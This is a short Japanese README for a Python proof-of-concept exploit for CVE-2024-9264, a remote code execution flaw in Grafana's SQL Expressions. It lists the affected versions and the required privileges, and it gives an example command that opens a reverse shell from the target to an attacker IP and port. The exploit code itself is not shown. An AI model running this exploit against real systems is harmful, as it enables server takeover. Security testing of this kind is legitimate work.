
Python製の概念実証コード。GrafanaのSQL Expressionsを介したリモートコード実行を実証し、不十分な入力サニタイズを悪用して、認証済みターゲット上で任意のシェルコマンドを実行します。
Grafanaにおけるリモートコード実行(RCE)の概念実証 (CVE-2024-9264)
このリポジトリは、GrafanaのSQL Expressions機能におけるリモートコード実行(RCE)脆弱性を悪用するPythonスクリプトを含んでいます。不十分な入力サニタイズを利用することで、このエクスプロイトは攻撃者がサーバー上で任意のシェルコマンドを実行することを可能にします。これはshellfsコミュニティ拡張機能を通じて可能になり、攻撃者はこの拡張機能をインストールしてロードすることでコマンド実行を容易にできます。
Viewer権限以上の認証されたGrafanaユーザーGrafana >= v11.0.0 (v11.x.yのすべてが影響を受けます)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
このスクリプトは教育目的およびシステムのセキュリティをテストする許可がある管理された環境での使用を意図しています。このツールの誤用は法的な結果を招く可能性があります。